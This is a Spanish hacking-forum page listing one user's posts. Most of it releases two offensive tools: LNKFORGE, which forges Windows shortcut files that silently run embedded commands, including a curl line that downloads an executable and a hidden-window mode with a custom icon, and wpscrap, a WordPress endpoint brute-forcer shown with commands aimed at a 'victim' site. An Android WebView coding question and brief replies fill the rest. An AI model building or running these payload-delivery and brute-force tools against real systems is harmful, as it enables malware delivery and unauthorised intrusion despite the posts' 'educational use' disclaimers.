Saludos igualmente pana buen aporte gracias.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#1
Hacking Tools / Re:CloudFail ¿? Descubrir las ip reales detras de Cloudflare activo en una web
Abril 13, 2025, 11:49:28 PM #2
Hacking Tools / [LNKFORGE] 🛠 Creacion de accesos directos LNK desde Linux.
Abril 11, 2025, 03:00:26 PM
🎯 LNKFORGE: Generador de accesos directos .LNK con payloads embebidos
💡 ¿Qué es LNKFORGE?
LNKFORGE es una herramienta desarrollada para generar archivos LNK (accesos directos de Windows) con comandos embebidos, sin necesidad de utilizar Wine, entornos Windows ni librerías externas. Su principal objetivo es modificar la estructura interna de un .LNK codificado en Base64, para inyectar comandos personalizados que se ejecutarán al abrir el acceso directo.
🔧 El script es completamente multiplataforma y puede ejecutarse en:
📦 Instalación
No hay dependencias externas requeridas, solo necesitas tener Python 3 instalado.
Código: text
📁 ¿Cómo funciona?
LNKFORGE se basa en la edición de un archivo .LNK
codificado en base64, insertando un bloque de comandos UTF-16BE codificados también en base64. Esto se hace de manera quirúrgica para no corromper la estructura del .LNK
.
📌 Estructura interna y conceptos clave:
✍️ Uso paso a paso
Código: text
🚀 Ejemplo práctico
Código: text
📁 Se generará un archivo
Código: text con los comandos embebidos.
🧪 Detalles técnicos
🧠 Conclusiones
Esta herramienta demuestra cómo es posible modificar accesos directos .LNK a bajo nivel sin interfaces gráficas ni dependencias externas. Ideal para pruebas de ingeniería inversa, ofuscación o entrenamiento en análisis de malware.
🛡� Úsese con fines educativos y éticos.
📎 Repositorio: 👉 No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
💡 ¿Qué es LNKFORGE?
LNKFORGE es una herramienta desarrollada para generar archivos LNK (accesos directos de Windows) con comandos embebidos, sin necesidad de utilizar Wine, entornos Windows ni librerías externas. Su principal objetivo es modificar la estructura interna de un .LNK codificado en Base64, para inyectar comandos personalizados que se ejecutarán al abrir el acceso directo.
🔧 El script es completamente multiplataforma y puede ejecutarse en:
- ✅ Windows
- ✅ Linux
- ✅ Termux (Android)
📦 Instalación
No hay dependencias externas requeridas, solo necesitas tener Python 3 instalado.
git clone https://github.com/IND4RKHK/lnkforge.git
cd lnkforge
python lnkforge.py
📁 ¿Cómo funciona?
LNKFORGE se basa en la edición de un archivo .LNK
codificado en base64, insertando un bloque de comandos UTF-16BE codificados también en base64. Esto se hace de manera quirúrgica para no corromper la estructura del .LNK
.
📌 Estructura interna y conceptos clave:
- 🧬b64_extra_bytes: Contiene el relleno de bytes " =============== " codificado en base64 (UTF-16BE). Este relleno define el "espacio disponible" en el .LNK para los comandos embebidos.
- 🛠 check_len_or_save(): Función encargada de codificar los comandos a UTF-16BE y luego a base64, devolviendo su longitud o el texto listo para ser insertado.
- 📜modular_lnk.b64: Archivo base que contiene las versiones originales del .LNK en diferentes modos:
Código: text normal
Código: text minimal
Código: text normal-icon
Código: text minimal-icon
- 🧩 El script detecta automáticamente si el payload sobrepasa el límite de espacio disponible en el .LNK
y recorta el último comando ingresado para garantizar integridad.
✍️ Uso paso a paso
python lnkforge.py
- ✨ Escribe comandos como
Código: text ls
Código: text whoami
Código: text systeminfo
Código: text curl https://example.com/file.x -o example.exe
- 💬 Usa los comandos especiales para cambiar el modo:
➡️ Ejecuta en modo minimizado.Código: text minimal
➡️ Minimizado + icono personalizado.Código: text minimal-icon
➡️ Ejecuta en primer plano.Código: text normal
➡️ Primer plano + icono.Código: text normal-icon
- 🧠 El script calcula el tamaño del payload y corta automáticamente si te excedes.
- 💾 Se genera un archivo .LNK con fecha automática en su nombre, listo para ser ejecutado.
🚀 Ejemplo práctico
cmd_lnk_executor >> whoami
cmd_lnk_executor >> ipconfig
cmd_lnk_executor >> exit
📁 Se generará un archivo
lnk_forged_2025-11-20.lnk
🧪 Detalles técnicos
- Se utiliza codificación UTF-16BE para garantizar compatibilidad con PowerShell.
- Se reconstruye el .LNK a partir del archivo base .b64, eliminando saltos de línea y ajustando los caracteres "=" para una decodificación correcta.
- El límite actual de bytes embebidos está determinado por la estructura original del .LNK.
- El script incluye un relleno suficientemente grande para permitir payloads medianos-grandes (~270 bytes).
🧠 Conclusiones
Esta herramienta demuestra cómo es posible modificar accesos directos .LNK a bajo nivel sin interfaces gráficas ni dependencias externas. Ideal para pruebas de ingeniería inversa, ofuscación o entrenamiento en análisis de malware.
🛡� Úsese con fines educativos y éticos.
📎 Repositorio: 👉 No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#3
Hacking Tools / [Release] wpscrap - Raspado de Endpoints WordPress
Marzo 29, 2025, 07:34:48 PM
💣 [Release] wpscrap - Raspado de Endpoints WordPress 💣
Hola mi gente de Underc0de 😈
Quería compartir con ustedes un proyecto en el que estoy trabajando, llamado mgt0ls. Hoy quiero enfocarme en una de sus herramientas llamada: wpscrap.
🚀 ¿Qué es wpscrap?
wpscrap es una herramienta diseñada para realizar raspado de endpoints en sitios WordPress. Su principal objetivo es identificar puntos de exposición o realizar ataques por fuerza bruta para descubrir endpoints ocultos o bloqueados. 💥
⚙️ ¿Cómo lo hace?
La herramienta cuenta con dos enfoques principales:
💻 Instalación
Para instalar wpscrap, sigue estos pasos:
🖥� ¿Cómo usar wpscrap?
Puedes usar la herramienta desde la GUI de mgt0ls o directamente desde la consola, ¡como prefieras! 😎
Ejemplo de Uso:
Código: text
📝 Parámetros:
💡 Ejemplo práctico:
Ataque de exposición:
Código: text
Ataque por diccionario:
Código: text
Eso es todo por ahora, ¡espero que les sea útil en sus auditorías de seguridad! Cualquier duda o sugerencia, ¡déjenla en los comentarios! 💀🔥
Hola mi gente de Underc0de 😈
Quería compartir con ustedes un proyecto en el que estoy trabajando, llamado mgt0ls. Hoy quiero enfocarme en una de sus herramientas llamada: wpscrap.
🚀 ¿Qué es wpscrap?
wpscrap es una herramienta diseñada para realizar raspado de endpoints en sitios WordPress. Su principal objetivo es identificar puntos de exposición o realizar ataques por fuerza bruta para descubrir endpoints ocultos o bloqueados. 💥
⚙️ ¿Cómo lo hace?
La herramienta cuenta con dos enfoques principales:
- Exposición de Endpoints: Detecta endpoints que están públicamente accesibles.
- Fuerza Bruta (Diccionario): Utiliza un diccionario para encontrar rutas bloqueadas o no indexadas.
💻 Instalación
Para instalar wpscrap, sigue estos pasos:
- Clona el repositorio:
Código: text git clone https://github.com/IND4RKHK/mgt0ls.git cd mgt0ls
- Ejecuta el instalador:
Código: text python3 setup.py
- ¡Listo! Ya tienes la herramienta instalada.
🖥� ¿Cómo usar wpscrap?
Puedes usar la herramienta desde la GUI de mgt0ls o directamente desde la consola, ¡como prefieras! 😎
Ejemplo de Uso:
python3 fsh.py wpscrap --a https://example.com/ --b SET --c CHECK
📝 Parámetros:
: Define la URL objetivo.Código: text --a
: Realiza el ataque identificando endpoints mediante exposición pública.Código: text --b SET
: Realiza el ataque por diccionario para detectar rutas bloqueadas.Código: text --b DIC
: Utiliza la opción recursiva para seguir encontrando endpoints relacionados.Código: text --c CHECK
💡 Ejemplo práctico:
Ataque de exposición:
python3 fsh.py wpscrap --a https://victima.com/ --b SET --c CHECK
Ataque por diccionario:
python3 fsh.py wpscrap --a https://victima.com/ --b DIC --c CHECK
Eso es todo por ahora, ¡espero que les sea útil en sus auditorías de seguridad! Cualquier duda o sugerencia, ¡déjenla en los comentarios! 💀🔥
#4
Hacking / Re:Verificaciones por SMS gratuitas - Números de Móviles Virtuales [Parte 1]
Marzo 29, 2025, 07:28:14 PM
messirve



#5
Dudas y pedidos generales / Ayudaa necesito para mi MainActivity.java
Junio 26, 2019, 12:42:38 AM
Hola buenas me gustaria saber como hacer para abrir en google este enlace que esta en mi app. Lo que quiero es que al entrar en la aplicacion se ejecute google y en esta se abara el url no que se ejecute en la app... Porfavor ayuda este es mi main activity...
public class MainActivity extends Activity {
private WebView webView;
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
webView = (WebView)findViewById(R.id.web);
webView.setWebViewClient(new WebViewClient() {
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
public boolean shouldOverrideUrlLoading(WebView view, String url) {
return false;
}
@TargetApi(Build.VERSION_CODES.N)
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
return false;
}
});
webView.loadUrl("www.url.com");
}
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
public boolean onKeyDown(int keyCode, KeyEvent event) {
if (event.getAction() == KeyEvent.ACTION_DOWN) {
switch (keyCode) {
case KeyEvent.KEYCODE_BACK:
if (webView.canGoBack()) {
webView.goBack();
} else {
finish();
}
return true;
}
}
return super.onKeyDown(keyCode, event);
}
}
public class MainActivity extends Activity {
private WebView webView;
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
webView = (WebView)findViewById(R.id.web);
webView.setWebViewClient(new WebViewClient() {
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
public boolean shouldOverrideUrlLoading(WebView view, String url) {
return false;
}
@TargetApi(Build.VERSION_CODES.N)
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
return false;
}
});
webView.loadUrl("www.url.com");
}
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
public boolean onKeyDown(int keyCode, KeyEvent event) {
if (event.getAction() == KeyEvent.ACTION_DOWN) {
switch (keyCode) {
case KeyEvent.KEYCODE_BACK:
if (webView.canGoBack()) {
webView.goBack();
} else {
finish();
}
return true;
}
}
return super.onKeyDown(keyCode, event);
}
}
#7
Presentaciones y cumpleaños / Hacking apps
Diciembre 22, 2017, 06:55:56 PM
chat creado con el fin de compartir :V
Páginas1